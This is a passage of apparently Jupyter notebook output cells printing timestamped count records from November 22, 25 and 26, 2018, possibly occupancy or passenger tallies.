"['2018-11-25 11:03:51', '10']\n",
"['2018-11-25 11:05:44', '10']\n",
"['2018-11-25 11:07:51', '11']\n",
"['2018-11-25 11:08:25', '6']\n",
"['2018-11-25 11:09:54', '7']\n",
"['2018-11-25 11:11:44', '7']\n",
"['2018-11-25 11:12:23', '0']\n",
"['2018-11-25 11:14:24', '0']\n",
"['2018-11-25 11:15:31', '0']\n",
"['2018-11-25 11:16:00', '0']\n",
"['2018-11-25 11:16:50', '0']\n",
"['2018-11-25 11:18:08', '0']\n",
"['2018-11-25 11:18:14', '0']\n",
"['2018-11-25 11:21:35', '4']\n",
"['2018-11-25 11:22:06', '4']\n",
"['2018-11-25 11:23:09', '4']\n",
"['2018-11-25 11:24:24', '5']\n",
"['2018-11-25 11:24:49', '11']\n",
"['2018-11-25 11:26:32', '11']\n",
"['2018-11-25 11:26:54', '11']\n",
"['2018-11-25 11:28:34', '17']\n",
"['2018-11-25 11:30:02', '17']\n",
"['2018-11-25 11:31:27', '18']\n",
"['2018-11-25 11:33:01', '18']\n",
"['2018-11-25 11:35:13', '19']\n",
"['2018-11-25 11:36:58', '12']\n",
"['2018-11-25 11:37:53', '12']\n",
"['2018-11-25 11:38:39', '0']\n",
"['2018-11-25 11:46:26', '3']\n",
"['2018-11-25 11:48:29', '5']\n",
"['2018-11-25 11:49:00', '5']\n",
"['2018-11-25 11:50:38', '4']\n",
"['2018-11-25 11:51:44', '5']\n",
"['2018-11-25 11:54:22', '5']\n",
"['2018-11-25 11:55:59', '5']\n",
"['2018-11-25 11:57:28', '5']\n",
"['2018-11-25 11:58:15', '5']\n",
"['2018-11-25 11:59:16', '2']\n",
"['2018-11-25 12:00:00', '2']\n",
"['2018-11-25 12:01:16', '2']\n",
"['2018-11-25 12:02:33', '1']\n",
"['2018-11-25 12:02:58', '0']\n",
"['2018-11-25 12:06:38', '3']\n",
"['2018-11-25 12:07:09', '3']\n",
"['2018-11-25 12:08:09', '3']\n",
"['2018-11-25 12:08:58', '7']\n",
"['2018-11-25 12:09:57', '7']\n",
"['2018-11-25 12:11:44', '8']\n",
"['2018-11-25 12:12:04', '8']\n",
"['2018-11-25 12:12:48', '8']\n",
"['2018-11-25 12:13:57', '10']\n",
"['2018-11-25 12:14:54', '11']\n",
"['2018-11-25 12:16:15', '12']\n",
"['2018-11-25 12:17:00', '12']\n",
"['2018-11-25 12:19:08', '11']\n",
"['2018-11-25 12:20:11', '11']\n",
"['2018-11-25 12:20:55', '0']\n",
"['2018-11-25 12:31:47', '8']\n",
"['2018-11-25 12:33:30', '9']\n",
"['2018-11-25 12:34:47', '9']\n",
"['2018-11-25 12:36:20', '9']\n",
"['2018-11-25 12:36:32', '5']\n",
"['2018-11-25 12:37:43', '4']\n",
"['2018-11-25 12:39:02', '3']\n",
"['2018-11-25 12:40:12', '4']\n",
"['2018-11-25 12:42:02', '4']\n",
"['2018-11-25 12:43:05', '3']\n",
"['2018-11-25 12:43:31', '3']\n",
"['2018-11-25 12:44:30', '3']\n",
"['2018-11-25 12:45:41', '1']\n",
"['2018-11-25 12:46:05', '0']\n",
"['2018-11-25 12:50:30', '0']\n",
"['2018-11-25 12:51:07', '0']\n",
"['2018-11-25 12:52:22', '1']\n",
"['2018-11-25 12:53:47', '1']\n",
"['2018-11-25 12:54:47', '1']\n",
"['2018-11-25 12:56:06', '3']\n",
"['2018-11-25 12:56:49', '4']\n",
"['2018-11-25 12:58:01', '4']\n",
"['2018-11-25 12:58:45', '4']\n",
"['2018-11-25 12:59:34', '2']\n",
"['2018-11-25 13:01:41', '4']\n",
"['2018-11-25 13:03:32', '4']\n",
"['2018-11-25 13:04:42', '4']\n",
"['2018-11-25 13:04:55', '6']\n",
"['2018-11-25 13:06:24', '0']\n",
"['2018-11-25 13:15:46', '5']\n",
"['2018-11-25 13:17:28', '8']\n",
"['2018-11-25 13:18:25', '8']\n",
"['2018-11-25 13:19:30', '7']\n",
"['2018-11-25 13:19:47', '7']\n",
"['2018-11-25 13:22:07', '8']\n",
"['2018-11-25 13:22:34', '6']\n",
"['2018-11-25 13:24:31', '5']\n",
"['2018-11-25 13:25:59', '4']\n",
"['2018-11-25 13:27:44', '3']\n",
"['2018-11-25 13:28:33', '3']\n",
"['2018-11-25 13:29:55', '3']\n",
"['2018-11-25 13:31:05', '3']\n",
"['2018-11-25 13:31:11', '0']\n",
"['2018-11-25 13:34:34', '2']\n",
"['2018-11-25 13:35:09', '4']\n",
"['2018-11-25 13:36:06', '4']\n",
"['2018-11-25 13:37:34', '5']\n",
"['2018-11-25 13:38:31', '5']\n",
"['2018-11-25 13:39:29', '5']\n",
"['2018-11-25 13:39:52', '5']\n",
"['2018-11-25 13:40:45', '5']\n",
"['2018-11-25 13:42:34', '5']\n",
"['2018-11-25 13:44:25', '7']\n",
"['2018-11-25 13:46:45', '7']\n",
"['2018-11-25 13:47:37', '7']\n",
"['2018-11-25 13:48:26', '7']\n",
"['2018-11-25 13:48:41', '5']\n",
"['2018-11-25 13:50:22', '0']\n",
"['2018-11-25 14:00:57', '26']\n",
"['2018-11-25 14:02:34', '29']\n",
"['2018-11-25 14:03:48', '27']\n",
"['2018-11-25 14:06:06', '27']\n",
"['2018-11-25 14:08:41', '12']\n",
"['2018-11-25 14:10:45', '12']\n",
"['2018-11-25 14:11:46', '11']\n",
"['2018-11-25 14:13:15', '8']\n",
"['2018-11-25 14:15:07', '2']\n",
"['2018-11-25 14:16:15', '2']\n",
"['2018-11-25 14:16:42', '1']\n",
"['2018-11-25 14:17:33', '1']\n",
"['2018-11-25 14:18:49', '1']\n",
"['2018-11-25 14:18:55', '0']\n",
"['2018-11-25 14:21:26', '1']\n",
"['2018-11-25 14:22:13', '1']\n",
"['2018-11-25 14:23:40', '1']\n",
"['2018-11-25 14:25:09', '2']\n",
"['2018-11-25 14:26:13', '2']\n",
"['2018-11-25 14:27:11', '2']\n",
"['2018-11-25 14:27:31', '2']\n",
"['2018-11-25 14:28:53', '2']\n",
"['2018-11-25 14:29:51', '2']\n",
"['2018-11-25 14:30:40', '7']\n",
"['2018-11-25 14:33:15', '9']\n",
"['2018-11-25 14:36:42', '9']\n",
"['2018-11-25 14:40:07', '9']\n",
"['2018-11-25 14:41:13', '11']\n",
"['2018-11-25 14:42:14', '0']\n",
"['2018-11-25 14:44:31', '11']\n",
"['2018-11-25 14:46:03', '14']\n",
"['2018-11-25 14:47:28', '13']\n",
"['2018-11-25 14:49:20', '11']\n",
"['2018-11-25 14:51:21', '12']\n",
"['2018-11-25 14:52:20', '10']\n",
"['2018-11-25 14:53:12', '7']\n",
"['2018-11-25 14:54:07', '4']\n",
"['2018-11-25 14:55:15', '3']\n",
"['2018-11-25 14:56:54', '1']\n",
"['2018-11-25 14:57:46', '0']\n",
"['2018-11-25 14:58:53', '0']\n",
"['2018-11-25 15:00:02', '0']\n",
"['2018-11-25 15:00:07', '0']\n",
"['2018-11-25 15:00:51', '0']\n",
"['2018-11-25 15:01:20', '0']\n",
"['2018-11-25 15:02:36', '2']\n",
"['2018-11-25 15:03:44', '3']\n",
"['2018-11-25 15:04:29', '4']\n",
"['2018-11-25 15:05:24', '4']\n",
"['2018-11-25 15:06:02', '6']\n",
"['2018-11-25 15:07:23', '9']\n",
"['2018-11-25 15:08:27', '9']\n",
"['2018-11-25 15:09:20', '13']\n",
"['2018-11-25 15:10:43', '15']\n",
"['2018-11-25 15:11:55', '15']\n",
"['2018-11-25 15:13:20', '13']\n",
"['2018-11-25 15:14:08', '12']\n",
"['2018-11-25 15:16:19', '0']\n",
"['2018-11-25 16:11:08', '24']\n",
"['2018-11-25 16:12:28', '24']\n",
"['2018-11-25 16:13:13', '24']\n",
"['2018-11-25 16:14:16', '22']\n",
"['2018-11-25 16:15:59', '20']\n",
"['2018-11-25 16:17:03', '15']\n",
"['2018-11-25 16:18:28', '5']\n",
"['2018-11-25 16:20:16', '2']\n",
"['2018-11-25 16:22:06', '2']\n",
"['2018-11-25 16:23:02', '2']\n",
"['2018-11-25 16:23:26', '2']\n",
"['2018-11-25 16:24:01', '1']\n",
"['2018-11-25 16:25:30', '0']\n",
"['2018-11-25 16:25:53', '0']\n",
"['2018-11-25 16:29:36', '3']\n",
"['2018-11-25 16:30:14', '3']\n",
"['2018-11-25 16:31:15', '3']\n",
"['2018-11-25 16:32:31', '5']\n",
"['2018-11-25 16:33:02', '5']\n",
"['2018-11-25 16:34:23', '9']\n",
"['2018-11-25 16:34:42', '9']\n",
"['2018-11-25 16:35:25', '9']\n",
"['2018-11-25 16:36:51', '11']\n",
"['2018-11-25 16:37:13', '8']\n",
"['2018-11-25 16:38:23', '9']\n",
"['2018-11-25 16:40:30', '9']\n",
"['2018-11-25 16:42:25', '8']\n",
"['2018-11-25 16:43:26', '8']\n",
"['2018-11-25 16:44:11', '0']\n",
"['2018-11-25 17:40:49', '3']\n",
"['2018-11-25 17:41:58', '3']\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-25 17:44:21', '4']\n",
"['2018-11-25 17:45:55', '4']\n",
"['2018-11-25 17:46:09', '2']\n",
"['2018-11-25 17:47:49', '3']\n",
"['2018-11-25 17:48:14', '2']\n",
"['2018-11-25 17:50:09', '1']\n",
"['2018-11-25 17:51:45', '1']\n",
"['2018-11-25 17:52:55', '1']\n",
"['2018-11-25 17:53:19', '1']\n",
"['2018-11-25 17:54:05', '1']\n",
"['2018-11-25 17:55:11', '0']\n",
"['2018-11-25 17:55:30', '0']\n",
"['2018-11-25 17:57:29', '0']\n",
"['2018-11-25 17:59:28', '0']\n",
"['2018-11-25 18:01:27', '0']\n",
"['2018-11-25 18:02:32', '0']\n",
"['2018-11-25 18:03:32', '2']\n",
"['2018-11-25 18:04:26', '2']\n",
"['2018-11-25 18:04:47', '2']\n",
"['2018-11-25 18:06:18', '3']\n",
"['2018-11-25 18:07:35', '2']\n",
"['2018-11-25 18:08:14', '2']\n",
"['2018-11-25 18:10:08', '13']\n",
"['2018-11-25 18:12:36', '13']\n",
"['2018-11-25 18:13:44', '13']\n",
"['2018-11-25 18:13:57', '10']\n",
"['2018-11-25 18:16:35', '0']\n",
"['2018-11-25 19:10:38', '24']\n",
"['2018-11-25 19:12:55', '25']\n",
"['2018-11-25 19:13:48', '25']\n",
"['2018-11-25 19:15:07', '24']\n",
"['2018-11-25 19:16:27', '20']\n",
"['2018-11-25 19:18:37', '24']\n",
"['2018-11-25 19:20:27', '19']\n",
"['2018-11-25 19:22:12', '13']\n",
"['2018-11-25 19:24:00', '13']\n",
"['2018-11-25 19:24:57', '9']\n",
"['2018-11-25 19:25:44', '2']\n",
"['2018-11-25 19:26:56', '2']\n",
"['2018-11-25 19:28:01', '2']\n",
"['2018-11-25 19:28:06', '0']\n",
"['2018-11-25 19:30:43', '2']\n",
"['2018-11-25 19:31:13', '2']\n",
"['2018-11-25 19:32:07', '0']\n",
"['2018-11-25 19:33:28', '0']\n",
"['2018-11-25 19:34:27', '2']\n",
"['2018-11-25 19:35:18', '2']\n",
"['2018-11-25 19:35:51', '2']\n",
"['2018-11-25 19:36:55', '2']\n",
"['2018-11-25 19:39:10', '3']\n",
"['2018-11-25 19:39:58', '3']\n",
"['2018-11-25 19:41:14', '2']\n",
"['2018-11-25 19:43:07', '2']\n",
"['2018-11-25 19:45:04', '2']\n",
"['2018-11-25 19:46:46', '2']\n",
"['2018-11-25 19:47:36', '0']\n",
"['2018-11-25 20:40:44', '9']\n",
"['2018-11-25 20:42:03', '9']\n",
"['2018-11-25 20:42:41', '9']\n",
"['2018-11-25 20:43:56', '9']\n",
"['2018-11-25 20:44:28', '9']\n",
"['2018-11-25 20:44:58', '9']\n",
"['2018-11-25 20:46:47', '7']\n",
"['2018-11-25 20:47:49', '7']\n",
"['2018-11-25 20:48:57', '7']\n",
"['2018-11-25 20:49:55', '5']\n",
"['2018-11-25 20:50:43', '3']\n",
"['2018-11-25 20:51:51', '1']\n",
"['2018-11-25 20:53:35', '1']\n",
"['2018-11-25 20:53:41', '0']\n",
"['2018-11-25 21:01:04', '0']\n",
"['2018-11-25 21:01:37', '0']\n",
"['2018-11-25 21:02:59', '1']\n",
"['2018-11-25 21:04:03', '5']\n",
"['2018-11-25 21:04:58', '7']\n",
"['2018-11-25 21:05:44', '7']\n",
"['2018-11-25 21:05:57', '7']\n",
"['2018-11-25 21:06:26', '7']\n",
"['2018-11-25 21:06:47', '5']\n",
"['2018-11-25 21:07:37', '7']\n",
"['2018-11-25 21:09:20', '5']\n",
"['2018-11-25 21:11:35', '5']\n",
"['2018-11-25 21:12:18', '5']\n",
"['2018-11-25 21:12:29', '3']\n",
"['2018-11-25 21:13:39', '0']\n",
"['2018-11-26 06:59:31', '1']\n",
"['2018-11-26 07:00:21', '2']\n",
"['2018-11-26 07:01:19', '2']\n",
"['2018-11-26 07:02:03', '3']\n",
"['2018-11-26 07:02:49', '4']\n",
"['2018-11-26 07:04:07', '4']\n",
"['2018-11-26 07:04:19', '3']\n",
"['2018-11-26 07:05:07', '5']\n",
"['2018-11-26 07:06:00', '6']\n",
"['2018-11-26 07:06:47', '7']\n",
"['2018-11-26 07:07:54', '9']\n",
"['2018-11-26 07:08:57', '9']\n",
"['2018-11-26 07:09:35', '9']\n",
"['2018-11-26 07:10:01', '9']\n",
"['2018-11-26 07:10:37', '0']\n",
"['2018-11-26 07:16:43', '0']\n",
"['2018-11-26 07:18:06', '0']\n",
"['2018-11-26 07:18:36', '0']\n",
"['2018-11-26 07:19:08', '0']\n",
"['2018-11-26 07:19:27', '0']\n",
"['2018-11-26 07:20:03', '0']\n",
"['2018-11-26 07:20:33', '0']\n",
"['2018-11-26 07:21:11', '0']\n",
"['2018-11-26 07:21:48', '0']\n",
"['2018-11-26 07:22:51', '0']\n",
"['2018-11-26 07:23:16', '0']\n",
"['2018-11-26 07:23:57', '0']\n",
"['2018-11-26 07:24:19', '0']\n",
"['2018-11-26 07:24:42', '0']\n",
"['2018-11-26 07:25:05', '0']\n",
"['2018-11-26 07:25:28', '0']\n",
"['2018-11-26 07:27:00', '0']\n",
"['2018-11-26 07:29:27', '0']\n",
"['2018-11-26 07:31:54', '0']\n",
"['2018-11-26 07:34:21', '0']\n",
"['2018-11-26 07:36:49', '1']\n",
"['2018-11-26 07:37:21', '1']\n",
"['2018-11-26 07:37:47', '0']\n",
"['2018-11-26 07:44:44', '1']\n",
"['2018-11-26 07:44:57', '1']\n",
"['2018-11-26 07:46:15', '1']\n",
"['2018-11-26 07:47:56', '1']\n",
"['2018-11-26 07:48:29', '2']\n",
"['2018-11-26 07:49:30', '2']\n",
"['2018-11-26 07:50:28', '2']\n",
"['2018-11-26 07:51:18', '7']\n",
"['2018-11-26 07:52:09', '8']\n",
"['2018-11-26 07:53:41', '8']\n",
"['2018-11-26 07:53:59', '8']\n",
"['2018-11-26 07:54:49', '8']\n",
"['2018-11-26 07:56:16', '8']\n",
"['2018-11-26 07:56:52', '6']\n",
"['2018-11-26 07:58:18', '6']\n",
"['2018-11-26 07:58:47', '9']\n",
"['2018-11-26 08:00:00', '9']\n",
"['2018-11-26 08:00:12', '10']\n",
"['2018-11-26 08:02:15', '0']\n",
"['2018-11-26 08:06:39', '15']\n",
"['2018-11-26 08:13:10', '14']\n",
"['2018-11-26 08:14:43', '11']\n",
"['2018-11-26 08:17:03', '11']\n",
"['2018-11-26 08:17:20', '12']\n",
"['2018-11-26 08:19:22', '11']\n",
"['2018-11-26 08:21:52', '11']\n",
"['2018-11-26 08:22:18', '10']\n",
"['2018-11-26 08:23:39', '9']\n",
"['2018-11-26 08:25:17', '6']\n",
"['2018-11-26 08:26:02', '2']\n",
"['2018-11-26 08:26:48', '2']\n",
"['2018-11-26 08:27:11', '2']\n",
"['2018-11-26 08:27:34', '2']\n",
"['2018-11-26 08:27:58', '2']\n",
"['2018-11-26 08:30:20', '2']\n",
"['2018-11-26 08:31:19', '1']\n",
"['2018-11-26 08:32:24', '3']\n",
"['2018-11-26 08:33:30', '4']\n",
"['2018-11-26 08:34:36', '5']\n",
"['2018-11-26 08:35:42', '5']\n",
"['2018-11-26 08:36:12', '6']\n",
"['2018-11-26 08:37:48', '0']\n",
"['2018-11-26 08:39:25', '18']\n",
"['2018-11-26 08:41:03', '30']\n",
"['2018-11-26 08:42:41', '31']\n",
"['2018-11-26 08:44:19', '32']\n",
"['2018-11-26 08:45:57', '39']\n",
"['2018-11-26 08:47:35', '41']\n",
"['2018-11-26 08:49:12', '43']\n",
"['2018-11-26 08:50:50', '47']\n",
"['2018-11-26 08:52:28', '53']\n",
"['2018-11-26 08:54:06', '38']\n",
"['2018-11-26 08:55:44', '42']\n",
"['2018-11-26 08:57:22', '45']\n",
"['2018-11-26 08:59:00', '46']\n",
"['2018-11-26 09:00:37', '45']\n",
"['2018-11-26 09:02:15', '29']\n",
"['2018-11-26 09:03:53', '18']\n",
"['2018-11-26 09:05:31', '17']\n",
"['2018-11-26 09:07:09', '17']\n",
"['2018-11-26 09:08:47', '0']\n",
"['2018-11-26 09:10:25', '41']\n",
"['2018-11-26 09:12:47', '45']\n",
"['2018-11-26 09:15:10', '44']\n",
"['2018-11-26 09:17:32', '39']\n",
"['2018-11-26 09:19:55', '36']\n",
"['2018-11-26 09:22:17', '26']\n",
"['2018-11-26 09:24:40', '17']\n",
"['2018-11-26 09:24:52', '2']\n",
"['2018-11-26 09:25:04', '2']\n",
"['2018-11-26 09:25:17', '3']\n",
"['2018-11-26 09:25:29', '2']\n",
"['2018-11-26 09:25:42', '1']\n",
"['2018-11-26 09:26:36', '1']\n",
"['2018-11-26 09:27:30', '1']\n",
"['2018-11-26 09:28:24', '1']\n",
"['2018-11-26 09:29:18', '1']\n",
"['2018-11-26 09:30:12', '0']\n",
"['2018-11-26 09:31:05', '0']\n",
"['2018-11-26 09:32:47', '0']\n",
"['2018-11-26 09:34:30', '0']\n",
"['2018-11-26 09:36:13', '0']\n",
"['2018-11-26 09:37:55', '0']\n",
"['2018-11-26 09:39:38', '0']\n",
"['2018-11-26 09:41:21', '4']\n",
"['2018-11-26 09:42:39', '5']\n",
"['2018-11-26 09:43:57', '5']\n",
"['2018-11-26 09:45:15', '5']\n",
"['2018-11-26 09:46:34', '8']\n",
"['2018-11-26 09:47:44', '8']\n",
"['2018-11-26 09:48:40', '11']\n",
"['2018-11-26 09:51:42', '19']\n",
"['2018-11-26 09:52:36', '23']\n",
"['2018-11-26 09:54:09', '31']\n",
"['2018-11-26 09:55:42', '33']\n",
"['2018-11-26 09:57:16', '36']\n",
"['2018-11-26 09:58:49', '36']\n",
"['2018-11-26 10:00:23', '30']\n",
"['2018-11-26 10:01:56', '27']\n",
"['2018-11-26 10:03:29', '29']\n",
"['2018-11-26 10:05:03', '26']\n",
"['2018-11-26 10:06:36', '26']\n",
"['2018-11-26 10:08:10', '0']\n",
"['2018-11-26 10:09:43', '63']\n",
"['2018-11-26 10:11:16', '64']\n",
"['2018-11-26 10:12:50', '59']\n",
"['2018-11-26 10:14:23', '57']\n",
"['2018-11-26 10:15:57', '57']\n",
"['2018-11-26 10:17:30', '42']\n",
"['2018-11-26 10:19:04', '36']\n",
"['2018-11-26 10:20:37', '23']\n",
"['2018-11-26 10:22:10', '17']\n",
"['2018-11-26 10:23:44', '13']\n",
"['2018-11-26 10:25:17', '6']\n",
"['2018-11-26 10:26:51', '2']\n",
"['2018-11-26 10:28:24', '2']\n",
"['2018-11-26 10:29:57', '2']\n",
"['2018-11-26 10:31:31', '2']\n",
"['2018-11-26 10:33:04', '2']\n",
"['2018-11-26 10:34:38', '2']\n",
"['2018-11-26 10:36:11', '2']\n",
"['2018-11-26 10:37:44', '2']\n",
"['2018-11-26 10:39:18', '2']\n",
"['2018-11-26 10:40:51', '2']\n",
"['2018-11-26 10:42:25', '2']\n",
"['2018-11-26 10:43:58', '0']\n",
"['2018-11-26 10:45:32', '5']\n",
"['2018-11-26 10:47:05', '8']\n",
"['2018-11-26 10:48:38', '8']\n",
"['2018-11-26 10:50:12', '8']\n",
"['2018-11-26 10:51:45', '9']\n",
"['2018-11-26 10:53:19', '9']\n",
"['2018-11-26 10:54:52', '9']\n",
"['2018-11-26 10:56:25', '15']\n",
"['2018-11-26 10:57:59', '15']\n",
"['2018-11-26 10:59:32', '15']\n",
"['2018-11-26 11:01:06', '15']\n",
"['2018-11-26 11:02:39', '15']\n",
"['2018-11-26 11:04:12', '14']\n",
"['2018-11-26 11:05:46', '8']\n",
"['2018-11-26 11:07:19', '4']\n",
"['2018-11-26 11:08:53', '4']\n",
"['2018-11-26 11:10:26', '3']\n",
"['2018-11-26 11:12:00', '3']\n",
"['2018-11-26 11:13:22', '0']\n",
"['2018-11-26 11:14:44', '38']\n",
"['2018-11-26 11:16:06', '36']\n",
"['2018-11-26 11:17:28', '38']\n",
"['2018-11-26 11:18:51', '34']\n",
"['2018-11-26 11:20:56', '28']\n",
"['2018-11-26 11:27:18', '15']\n",
"['2018-11-22 06:11:45', '1']\n",
"['2018-11-22 06:12:38', '5']\n",
"['2018-11-22 06:16:05', '5']\n",
"['2018-11-22 06:16:20', '5']\n",
"['2018-11-22 06:17:02', '7']\n",
"['2018-11-22 06:17:57', '9']\n",
"['2018-11-22 06:18:40', '10']\n",
"['2018-11-22 06:19:19', '10']\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 06:19:28', '10']\n",
"['2018-11-22 06:20:01', '10']\n",
"['2018-11-22 06:20:29', '10']\n",
"['2018-11-22 06:20:50', '10']\n",
"['2018-11-22 06:21:24', '12']\n",
"['2018-11-22 06:22:10', '14']\n",
"['2018-11-22 06:23:28', '14']\n",
"['2018-11-22 06:23:53', '14']\n",
"['2018-11-22 06:24:01', '14']\n",
"['2018-11-22 06:25:07', '15']\n",
"['2018-11-22 06:25:56', '15']\n",
"['2018-11-22 06:28:14', '5']\n",
"['2018-11-22 06:29:30', '5']\n",
"['2018-11-22 06:29:56', '5']\n",
"['2018-11-22 06:30:24', '5']\n",
"['2018-11-22 06:31:09', '5']\n",
"['2018-11-22 06:32:22', '4']\n",
"['2018-11-22 06:33:38', '5']\n",
"['2018-11-22 06:34:55', '5']\n",
"['2018-11-22 06:35:16', '5']\n",
"['2018-11-22 06:35:29', '5']\n",
"['2018-11-22 06:41:52', '5']\n",
"['2018-11-22 06:42:13', '4']\n",
"['2018-11-22 06:42:46', '4']\n",
"['2018-11-22 06:43:17', '4']\n",
"['2018-11-22 06:43:36', '4']\n",
"['2018-11-22 06:43:58', '4']\n",
"['2018-11-22 06:44:28', '4']\n",
"['2018-11-22 06:45:01', '4']\n",
"['2018-11-22 06:45:27', '4']\n",
"['2018-11-22 06:45:39', '4']\n",
"['2018-11-22 06:46:33', '5']\n",
"['2018-11-22 06:47:39', '4']\n",
"['2018-11-22 06:48:24', '4']\n",
"['2018-11-22 06:48:42', '4']\n",
"['2018-11-22 06:49:29', '4']\n",
"['2018-11-22 06:49:58', '3']\n",
"['2018-11-22 06:50:36', '3']\n",
"['2018-11-22 06:51:05', '3']\n",
"['2018-11-22 06:51:29', '3']\n",
"['2018-11-22 06:51:49', '0']\n",
"['2018-11-22 06:52:58', '0']\n",
"['2018-11-22 06:53:34', '0']\n",
"['2018-11-22 06:53:58', '0']\n",
"['2018-11-22 06:54:28', '0']\n",
"['2018-11-22 06:54:54', '0']\n",
"['2018-11-22 06:55:13', '0']\n",
"['2018-11-22 06:55:40', '0']\n",
"['2018-11-22 06:56:02', '1']\n",
"['2018-11-22 06:58:27', '1']\n",
"['2018-11-22 06:58:40', '2']\n",
"['2018-11-22 06:59:41', '2']\n",
"['2018-11-22 07:00:13', '3']\n",
"['2018-11-22 07:00:52', '3']\n",
"['2018-11-22 07:01:06', '5']\n",
"['2018-11-22 07:01:58', '5']\n",
"['2018-11-22 07:02:16', '5']\n",
"['2018-11-22 07:02:53', '7']\n",
"['2018-11-22 07:03:50', '7']\n",
"['2018-11-22 07:04:13', '7']\n",
"['2018-11-22 07:04:34', '6']\n",
"['2018-11-22 07:04:39', '6']\n",
"['2018-11-22 07:06:34', '6']\n",
"['2018-11-22 07:06:52', '7']\n",
"['2018-11-22 07:08:40', '7']\n",
"['2018-11-22 07:08:56', '6']\n",
"['2018-11-22 07:09:28', '6']\n",
"['2018-11-22 07:09:39', '7']\n",
"['2018-11-22 07:12:34', '4']\n",
"['2018-11-22 07:15:31', '4']\n",
"['2018-11-22 07:16:16', '4']\n",
"['2018-11-22 07:16:47', '4']\n",
"['2018-11-22 07:17:47', '4']\n",
"['2018-11-22 07:18:02', '4']\n",
"['2018-11-22 07:18:30', '4']\n",
"['2018-11-22 07:19:16', '4']\n",
"['2018-11-22 07:21:07', '3']\n",
"['2018-11-22 07:21:42', '3']\n",
"['2018-11-22 07:21:59', '3']\n",
"['2018-11-22 07:22:50', '3']\n",
"['2018-11-22 07:23:16', '3']\n",
"['2018-11-22 07:23:46', '0']\n",
"['2018-11-22 07:24:39', '0']\n",
"['2018-11-22 07:25:14', '0']\n",
"['2018-11-22 07:25:23', '1']\n",
"['2018-11-22 07:29:19', '2']\n",
"['2018-11-22 07:30:34', '0']\n",
"['2018-11-22 07:41:00', '12']\n",
"['2018-11-22 07:41:59', '15']\n",
"['2018-11-22 07:45:04', '18']\n",
"['2018-11-22 07:46:01', '18']\n",
"['2018-11-22 07:46:57', '18']\n",
"['2018-11-22 07:47:11', '19']\n",
"['2018-11-22 07:47:55', '21']\n",
"['2018-11-22 07:48:54', '21']\n",
"['2018-11-22 07:49:13', '24']\n",
"['2018-11-22 07:50:22', '24']\n",
"['2018-11-22 07:50:41', '25']\n",
"['2018-11-22 07:51:24', '26']\n",
"['2018-11-22 07:52:23', '27']\n",
"['2018-11-22 07:53:15', '28']\n",
"['2018-11-22 07:54:55', '28']\n",
"['2018-11-22 07:55:20', '27']\n",
"['2018-11-22 07:56:03', '27']\n",
"['2018-11-22 07:57:12', '27']\n",
"['2018-11-22 07:57:57', '27']\n",
"['2018-11-22 08:02:38', '34']\n",
"['2018-11-22 08:05:09', '38']\n",
"['2018-11-22 08:06:08', '36']\n",
"['2018-11-22 08:09:32', '36']\n",
"['2018-11-22 08:09:58', '35']\n",
"['2018-11-22 08:11:49', '30']\n",
"['2018-11-22 08:13:25', '47']\n",
"['2018-11-22 08:16:20', '46']\n",
"['2018-11-22 08:17:17', '44']\n",
"['2018-11-22 08:17:28', '43']\n",
"['2018-11-22 08:19:03', '43']\n",
"['2018-11-22 08:19:24', '43']\n",
"['2018-11-22 08:20:51', '43']\n",
"['2018-11-22 08:21:58', '31']\n",
"['2018-11-22 08:22:48', '30']\n",
"['2018-11-22 08:23:27', '29']\n",
"['2018-11-22 08:24:27', '29']\n",
"['2018-11-22 08:24:54', '30']\n",
"['2018-11-22 08:25:48', '30']\n",
"['2018-11-22 08:26:28', '30']\n",
"['2018-11-22 08:28:11', '30']\n",
"['2018-11-22 08:28:57', '30']\n",
"['2018-11-22 08:29:52', '31']\n",
"['2018-11-22 08:30:39', '30']\n",
"['2018-11-22 08:31:26', '30']\n",
"['2018-11-22 08:32:05', '30']\n",
"['2018-11-22 08:32:41', '6']\n",
"['2018-11-22 08:34:02', '3']\n",
"['2018-11-22 08:34:27', '3']\n",
"['2018-11-22 08:34:46', '0']\n",
"['2018-11-22 08:35:55', '7']\n",
"['2018-11-22 08:37:05', '7']\n",
"['2018-11-22 08:38:15', '9']\n",
"['2018-11-22 08:39:25', '10']\n",
"['2018-11-22 08:40:35', '10']\n",
"['2018-11-22 08:41:44', '13']\n",
"['2018-11-22 08:42:54', '17']\n",
"['2018-11-22 08:44:04', '27']\n",
"['2018-11-22 08:45:14', '32']\n",
"['2018-11-22 08:46:24', '39']\n",
"['2018-11-22 08:47:33', '38']\n",
"['2018-11-22 08:48:43', '39']\n",
"['2018-11-22 08:49:53', '41']\n",
"['2018-11-22 08:51:03', '43']\n",
"['2018-11-22 08:52:13', '46']\n",
"['2018-11-22 08:53:22', '49']\n",
"['2018-11-22 08:54:32', '47']\n",
"['2018-11-22 08:55:42', '52']\n",
"['2018-11-22 08:56:52', '55']\n",
"['2018-11-22 08:58:02', '58']\n",
"['2018-11-22 08:59:11', '58']\n",
"['2018-11-22 09:00:21', '60']\n",
"['2018-11-22 09:01:31', '60']\n",
"['2018-11-22 09:02:41', '44']\n",
"['2018-11-22 09:03:51', '39']\n",
"['2018-11-22 09:05:00', '38']\n",
"['2018-11-22 09:06:10', '29']\n",
"['2018-11-22 09:07:20', '30']\n",
"['2018-11-22 09:08:30', '34']\n",
"['2018-11-22 09:09:40', '37']\n",
"['2018-11-22 09:10:49', '41']\n",
"['2018-11-22 09:11:59', '46']\n",
"['2018-11-22 09:13:09', '43']\n",
"['2018-11-22 09:14:19', '28']\n",
"['2018-11-22 09:15:29', '28']\n",
"['2018-11-22 09:16:38', '30']\n",
"['2018-11-22 09:17:48', '21']\n",
"['2018-11-22 09:18:58', '22']\n",
"['2018-11-22 09:20:08', '22']\n",
"['2018-11-22 09:21:18', '22']\n",
"['2018-11-22 09:22:27', '22']\n",
"['2018-11-22 09:23:37', '6']\n",
"['2018-11-22 09:24:47', '5']\n",
"['2018-11-22 09:25:57', '5']\n",
"['2018-11-22 09:27:07', '5']\n",
"['2018-11-22 09:28:16', '3']\n",
"['2018-11-22 09:29:26', '3']\n",
"['2018-11-22 09:30:36', '3']\n",
"['2018-11-22 09:31:46', '0']\n",
"['2018-11-22 09:32:56', '1']\n",
"['2018-11-22 09:33:35', '4']\n",
"['2018-11-22 09:33:56', '4']\n",
"['2018-11-22 09:34:52', '5']\n",
"['2018-11-22 09:36:37', '5']\n",
"['2018-11-22 09:37:11', '7']\n",
"['2018-11-22 09:38:25', '9']\n",
"['2018-11-22 09:38:38', '9']\n",
